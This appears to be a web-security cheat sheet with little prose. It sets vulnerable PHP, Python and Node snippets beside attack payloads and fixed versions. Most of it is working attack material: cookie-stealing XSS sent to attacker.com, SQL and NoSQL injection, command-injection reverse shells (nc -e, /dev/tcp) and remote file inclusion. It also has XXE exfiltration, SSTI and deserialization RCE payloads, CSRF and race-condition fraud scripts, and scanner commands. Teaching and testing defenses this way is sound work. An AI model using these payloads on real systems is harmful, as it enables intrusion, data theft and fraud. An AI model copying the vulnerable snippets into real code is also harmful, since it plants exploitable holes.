<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

<?php
$username = $_GET['user'];
$query = "SELECT * FROM users WHERE username = '$username'";
$result = mysqli_query($conn, $query);
?>

# Boolean-based
?user=admin' OR '1'='1

# Union-based
?user=admin' UNION SELECT 1,2,3,password,5 FROM users--

# Time-based blind
?user=admin' AND SLEEP(5)--

# Error-based
?user=admin' AND 1=CONVERT(int,(SELECT @@version))--

# Stacked queries
?user=admin'; DROP TABLE users--

<?php
$stmt = $conn->prepare("SELECT * FROM users WHERE username = ?");
$stmt->bind_param("s", $_GET['user']);
$stmt->execute();
$result = $stmt->get_result();
?>

<?php
echo "Hello " . $_GET['name'];
?>

?name=<script>alert(document.cookie)</script>
?name=<img src=x onerror=alert(1)>
?name=<svg/onload=alert(1)>

<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

#### DOM-based XSS
````javascript
// Vulnerable JS
document.write(location.hash.substring(1));

// Exploit
#<img src=x onerror=alert(1)>
````

<!-- Filter bypass -->
<ScRiPt>alert(1)</sCrIpT>
<script>alert(String.fromCharCode(88,83,83))</script>
<iframe src="javascript:alert(1)">
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>

<?php
echo "Hello " . htmlspecialchars($_GET['name'], ENT_QUOTES, 'UTF-8');
?>

<?php
if ($_GET['action'] == 'delete') {
    $id = $_GET['id'];
    mysqli_query($conn, "DELETE FROM posts WHERE id = $id");
}
?>

<!-- Attacker's page -->
<img src="https://victim.com/delete.php?action=delete&id=123">

<!-- Hidden form auto-submit -->
<form action="https://bank.com/transfer" method="POST" id="csrf">
    <input name="to" value="attacker">
    <input name="amount" value="10000">
</form>
<script>document.getElementById('csrf').submit();</script>

<?php
session_start();

// Generate token
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// Verify token
if ($_POST['csrf_token'] !== $_SESSION['csrf_token']) {
    die('CSRF token validation failed');
}
?>

<?php
$ip = $_GET['ip'];
system("ping -c 4 " . $ip);
?>

# Basic
?ip=127.0.0.1; whoami

# Command chaining
?ip=127.0.0.1 && cat /etc/passwd
?ip=127.0.0.1 | ls -la
?ip=127.0.0.1; nc -e /bin/sh attacker.com 4444

# Bypass filters
?ip=127.0.0.1`whoami`
?ip=127.0.0.1$(whoami)
?ip=127.0.0.1%0awhoami

# Reverse shell
?ip=127.0.0.1; bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

<?php
$ip = $_GET['ip'];
if (filter_var($ip, FILTER_VALIDATE_IP)) {
    $escaped = escapeshellarg($ip);
    system("ping -c 4 $escaped");
} else {
    die('Invalid IP');
}
?>

<?php
$file = $_GET['file'];
include("/var/www/html/pages/" . $file);
?>

# Basic
?file=../../../../etc/passwd

# Null byte injection (old PHP)
?file=../../../../etc/passwd%00

# URL encoding
?file=..%2f..%2f..%2f..%2fetc%2fpasswd

# Double encoding
?file=..%252f..%252f..%252fetc%252fpasswd

# Windows
?file=../../../../windows/win.ini
?file=..\..\..\..\windows\win.ini

<?php
$file = basename($_GET['file']); // Remove directory paths
$allowed = ['home.php', 'about.php', 'contact.php'];

if (in_array($file, $allowed)) {
    include("/var/www/html/pages/" . $file);
} else {
    die('Invalid file');
}
?>

<?php
$page = $_GET['page'];
include($page . ".php");
?>

# Basic LFI
?page=../../../../etc/passwd

# PHP wrapper - Base64
?page=php://filter/convert.base64-encode/resource=index

# PHP wrapper - Expect
?page=expect://whoami

# Data wrapper
?page=data://text/plain,<?php system($_GET['cmd']); ?>

# Log poisoning
# 1. Poison Apache log
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com
# 2. Include log
?page=../../../../var/log/apache2/access.log&cmd=whoami

# Session file inclusion
?page=../../../../tmp/sess_[SESSION_ID]

# /proc/self/environ
?page=../../../../proc/self/environ

<?php
$allowed = ['home', 'about', 'contact'];
$page = $_GET['page'];

if (in_array($page, $allowed)) {
    include($page . ".php");
} else {
    die('Invalid page');
}
?>

<?php
// php.ini: allow_url_include = On
$page = $_GET['page'];
include($page);
?>

# Basic RFI
?page=http://attacker.com/shell.txt

# FTP wrapper
?page=ftp://attacker.com/shell.txt

# SMB wrapper (Windows)
?page=\\attacker.com\share\shell.txt

# Bypass filters
?page=http://attacker.com/shell.txt?
?page=http://attacker.com/shell.txt#

<?php system($_GET['cmd']); ?>

<?php
// php.ini: allow_url_include = Off
$allowed = ['home', 'about', 'contact'];
$page = basename($_GET['page']);

if (in_array($page, $allowed)) {
    include(__DIR__ . "/pages/" . $page . ".php");
}
?>

<?php
$url = $_GET['url'];
$content = file_get_contents($url);
echo $content;
?>

# Internal network scan
?url=http://localhost:8080
?url=http://127.0.0.1/admin
?url=http://192.168.1.1

# Cloud metadata
?url=http://169.254.169.254/latest/meta-data/
?url=http://169.254.169.254/latest/user-data/

# File protocol
?url=file:///etc/passwd

# Port scanning
?url=http://internal-server:22
?url=http://internal-server:3306

# Bypass filters
?url=http://127.1
?url=http://[::1]
?url=http://2130706433 (decimal IP)
?url=http://0x7f000001 (hex IP)

<?php
$url = $_GET['url'];
$parsed = parse_url($url);

$blocked = ['127.0.0.1', 'localhost', '::1', '169.254.169.254'];

if (in_array($parsed['host'], $blocked)) {
    die('Blocked');
}

if (filter_var($url, FILTER_VALIDATE_URL) && 
    preg_match('/^https?:\/\//', $url)) {
    $content = file_get_contents($url);
    echo $content;
}
?>

<?php
$xml = simplexml_load_string($_POST['xml']);
echo $xml;
?>

<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
    <data>&xxe;</data>
</root>

<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
%remote;
%init;
%trick;
]>
<root></root>

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % init "<!ENTITY &#37; trick SYSTEM 'http://attacker.com/?data=%file;'>">

<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://internal-server/admin">
]>
<root>&xxe;</root>

<?php
libxml_disable_entity_loader(true);
$xml = simplexml_load_string($_POST['xml'], 'SimpleXMLElement', LIBXML_NOENT);
?>

<?php
class User {
    public $isAdmin = false;

    public function __destruct() {
        if ($this->isAdmin) {
            system($this->command);
        }
    }
}

$data = unserialize($_COOKIE['user']);
?>

<?php
class User {
    public $isAdmin = true;
    public $command = "whoami";
}

$payload = serialize(new User());
echo base64_encode($payload);
// Send as cookie
?>

import pickle
import base64
import os

class RCE:
    def __reduce__(self):
        return (os.system, ('whoami',))

payload = pickle.dumps(RCE())
print(base64.b64encode(payload))

<?php
// Use JSON instead
$data = json_decode($_COOKIE['user'], true);

// Or sign serialized data
$serialized = serialize($data);
$signature = hash_hmac('sha256', $serialized, SECRET_KEY);
$safe_data = base64_encode($serialized . '|' . $signature);
?>

<?php
$username = $_POST['username'];
$password = $_POST['password'];

$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysqli_query($conn, $query);

if (mysqli_num_rows($result) > 0) {
    $_SESSION['logged_in'] = true;
}
?>

# SQL Injection auth bypass
username: admin' OR '1'='1
password: anything

# NoSQL injection
username: admin
password: {"$ne": null}

# Type juggling (PHP)
password: 0 (if stored hash starts with "0e")

# Default credentials
admin:admin
root:root
admin:password123

<?php
$stmt = $conn->prepare("SELECT * FROM users WHERE username = ?");
$stmt->bind_param("s", $_POST['username']);
$stmt->execute();
$result = $stmt->get_result();
$user = $result->fetch_assoc();

if ($user && password_verify($_POST['password'], $user['password'])) {
    $_SESSION['logged_in'] = true;
}
?>

<?php
// No session regeneration
session_start();
if ($_POST['username'] == 'admin') {
    $_SESSION['user'] = 'admin';
}

// Predictable session ID
session_id(md5($_SERVER['REMOTE_ADDR']));
?>

<!-- Attacker sends victim -->
http://target.com/login.php?PHPSESSID=attacker_session_id

# Steal session cookie via XSS
<script>fetch('http://attacker.com/?s='+document.cookie)</script>

# Session prediction
# If sessions are: sess_1001, sess_1002, sess_1003
# Try: sess_1004, sess_1005...

<?php
session_start([
    'cookie_httponly' => true,
    'cookie_secure' => true,
    'cookie_samesite' => 'Strict',
    'use_strict_mode' => true
]);

if ($_POST['username'] == 'admin') {
    session_regenerate_id(true); // Prevent fixation
    $_SESSION['user'] = 'admin';
    $_SESSION['ip'] = $_SERVER['REMOTE_ADDR'];
    $_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
}

// Validate session
if ($_SESSION['ip'] !== $_SERVER['REMOTE_ADDR']) {
    session_destroy();
}
?>

<?php
// Direct object reference without auth check
$user_id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = $user_id";
$result = mysqli_query($conn, $query);
?>

# IDOR
/profile.php?id=1  # Your profile
/profile.php?id=2  # Someone else's profile

# Horizontal privilege escalation
/api/user/123/orders  # Your orders
/api/user/456/orders  # Victim's orders

# Vertical privilege escalation
/admin/panel  # Access without admin role

<?php
session_start();

$user_id = $_GET['id'];
$current_user = $_SESSION['user_id'];

// Check ownership
if ($user_id != $current_user && !$_SESSION['is_admin']) {
    die('Access denied');
}

$stmt = $conn->prepare("SELECT * FROM users WHERE id = ? AND (id = ? OR ? = 1)");
$stmt->bind_param("iii", $user_id, $current_user, $_SESSION['is_admin']);
$stmt->execute();
?>

# Flask/Jinja2
from flask import request, render_template_string

@app.route('/hello')
def hello():
    name = request.args.get('name')
    template = f"<h1>Hello {name}</h1>"
    return render_template_string(template)

# RCE payload
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}

# Alternative
{{''.__class__.__mro__[1].__subclasses__()[396]('whoami',shell=True,stdout=-1).communicate()}}

# File read
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

{{_self.env.registerUndefinedFilterCallback("system")}}
{{_self.env.getFilter("whoami")}}

<#assign ex="freemarker.template.utility.Execute"?new()>
${ex("whoami")}

from flask import request, render_template

@app.route('/hello')
def hello():
    name = request.args.get('name')
    # Use render_template with safe variable passing
    return render_template('hello.html', name=name)

// MongoDB
const username = req.body.username;
const password = req.body.password;

db.collection('users').findOne({
    username: username,
    password: password
});

// Authentication bypass
{
    "username": "admin",
    "password": {"$ne": null}
}

// OR operator
{
    "username": {"$or": [{"username": "admin"}, {"username": "user"}]},
    "password": "anything"
}

// Regex injection
{
    "username": {"$regex": "^admin"},
    "password": {"$gt": ""}
}

// JavaScript injection
{
    "username": "admin",
    "password": {"$where": "1==1"}
}

const username = String(req.body.username);
const password = String(req.body.password);

// Type validation
if (typeof username !== 'string' || typeof password !== 'string') {
    return res.status(400).send('Invalid input');
}

db.collection('users').findOne({
    username: username,
    password: password
});

<?php
$username = $_POST['username'];
$password = $_POST['password'];

$filter = "(&(uid=$username)(userPassword=$password))";
$result = ldap_search($ldap, $base_dn, $filter);
?>

# Authentication bypass
username: *)(uid=*))(|(uid=*
password: anything

# Result: (&(uid=*)(uid=*))(|(uid=*)(userPassword=anything))

# Enumerate users
username: admin*
username: admi*
username: test*

# Bypass with OR
username: *)(|(objectClass=*

<?php
function ldap_escape($str) {
    $metaChars = ['\\', '*', '(', ')', "\0"];
    $escape = ['\\5c', '\\2a', '\\28', '\\29', '\\00'];
    return str_replace($metaChars, $escape, $str);
}

$username = ldap_escape($_POST['username']);
$password = ldap_escape($_POST['password']);

$filter = "(&(uid=$username)(userPassword=$password))";
?>

<?php
// Download any user's file
$file_id = $_GET['id'];
$file = "/uploads/" . $file_id . ".pdf";
readfile($file);
?>

# Sequential ID enumeration
/download.php?id=1
/download.php?id=2
/download.php?id=3

# UUID guessing (if predictable)
/download.php?id=00000000-0000-0000-0000-000000000001

# Base64 encoded IDs
/download.php?id=MQ== (1 in base64)
/download.php?id=Mg== (2 in base64)

<?php
session_start();

$file_id = $_GET['id'];
$user_id = $_SESSION['user_id'];

// Check ownership
$stmt = $conn->prepare("SELECT * FROM files WHERE id = ? AND user_id = ?");
$stmt->bind_param("ii", $file_id, $user_id);
$stmt->execute();
$result = $stmt->get_result();

if ($result->num_rows === 0) {
    die('Access denied');
}

$file = $result->fetch_assoc();
readfile($file['path']);
?>

<?php
// Race condition in money transfer
$balance = get_balance($_SESSION['user_id']);
$amount = $_POST['amount'];

if ($balance >= $amount) {
    transfer($amount, $_POST['to_user']);
    update_balance($_SESSION['user_id'], $balance - $amount);
}
?>

import requests
import threading

def transfer():
    requests.post('https://bank.com/transfer', data={
        'amount': 1000,
        'to_user': 'attacker'
    })

# Send 100 simultaneous requests
threads = [threading.Thread(target=transfer) for _ in range(100)]
for t in threads: t.start()

# Transfer negative amount (increase balance)
amount=-1000

# Price manipulation
price=-100
quantity=1

# Large quantity causes overflow
quantity=999999999999999999999999999999

<?php
// Use database transaction
$conn->begin_transaction();

try {
    $stmt = $conn->prepare("SELECT balance FROM users WHERE id = ? FOR UPDATE");
    $stmt->bind_param("i", $_SESSION['user_id']);
    $stmt->execute();
    $balance = $stmt->get_result()->fetch_assoc()['balance'];

    $amount = abs((int)$_POST['amount']); // Prevent negative

    if ($balance >= $amount && $amount > 0) {
        $stmt = $conn->prepare("UPDATE users SET balance = balance - ? WHERE id = ?");
        $stmt->bind_param("ii", $amount, $_SESSION['user_id']);
        $stmt->execute();

        $stmt = $conn->prepare("UPDATE users SET balance = balance + ? WHERE id = ?");
        $stmt->bind_param("ii", $amount, $_POST['to_user']);
        $stmt->execute();

        $conn->commit();
    } else {
        $conn->rollback();
    }
} catch (Exception $e) {
    $conn->rollback();
}
?>

<?php
// Promo code usage
$code = $_POST['code'];
$used = check_if_used($code, $_SESSION['user_id']);

if (!$used) {
    apply_discount($code);
    mark_as_used($code, $_SESSION['user_id']);
}
?>

import requests
from concurrent.futures import ThreadPoolExecutor

def use_promo():
    r = requests.post('https://shop.com/apply_promo', 
        data={'code': 'SAVE50'},
        cookies={'session': 'victim_session'})
    return r.text

# Use same promo code 100 times simultaneously
with ThreadPoolExecutor(max_workers=100) as executor:
    results = list(executor.map(lambda _: use_promo(), range(100)))

print(f"Successfully used: {sum('success' in r for r in results)} times")

<?php
$conn->begin_transaction();

try {
    // Lock the row
    $stmt = $conn->prepare("SELECT * FROM promo_usage WHERE code = ? AND user_id = ? FOR UPDATE");
    $stmt->bind_param("si", $_POST['code'], $_SESSION['user_id']);
    $stmt->execute();
    $result = $stmt->get_result();

    if ($result->num_rows === 0) {
        apply_discount($_POST['code']);

        $stmt = $conn->prepare("INSERT INTO promo_usage (code, user_id) VALUES (?, ?)");
        $stmt->bind_param("si", $_POST['code'], $_SESSION['user_id']);
        $stmt->execute();

        $conn->commit();
    } else {
        $conn->rollback();
    }
} catch (Exception $e) {
    $conn->rollback();
}
?>

<?php
$url = $_GET['redirect'];
header("Location: " . $url);
?>

?redirect=https://evil.com/phishing
?redirect=//evil.com
?redirect=javascript:alert(1)

<?php
$allowed = ['https://example.com', 'https://shop.example.com'];
$url = $_GET['redirect'];

if (in_array($url, $allowed)) {
    header("Location: " . $url);
}
?>

<?php
$name = $_GET['name'];
header("X-User-Name: " . $name);
?>

?name=Admin%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:text/html%0d%0a%0d%0a<script>alert(1)</script>

<?php
$name = preg_replace('/[\r\n]/', '', $_GET['name']);
header("X-User-Name: " . $name);
?>

<?php
$user = new User();
foreach ($_POST as $key => $value) {
    $user->$key = $value; // Dangerous!
}
$user->save();
?>

# POST request
name=John&email=john@example.com&isAdmin=1&role=admin

<?php
$allowed = ['name', 'email', 'phone'];
$user = new User();

foreach ($_POST as $key => $value) {
    if (in_array($key, $allowed)) {
        $user->$key = $value;
    }
}
$user->save();
?>

Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'
Referrer-Policy: strict-origin-when-cross-origin
Permissions-Policy: geolocation=(), microphone=(), camera=()

# Burp Suite
# OWASP ZAP
# Nikto
nikto -h https://target.com

# SQLMap
sqlmap -u "http://target.com/page?id=1" --dbs

# XSStrike
python3 xsstrike.py -u "http://target.com/search?q="

# Nuclei
nuclei -u https://target.com -t cves/

# Nmap
nmap -sV -sC target.com

# cURL
curl -X POST -d "param=value" https://target.com

# ffuf (fuzzing)
ffuf -u https://target.com/FUZZ -w wordlist.txt

# wfuzz
wfuzz -c -z file,wordlist.txt https://target.com/FUZZ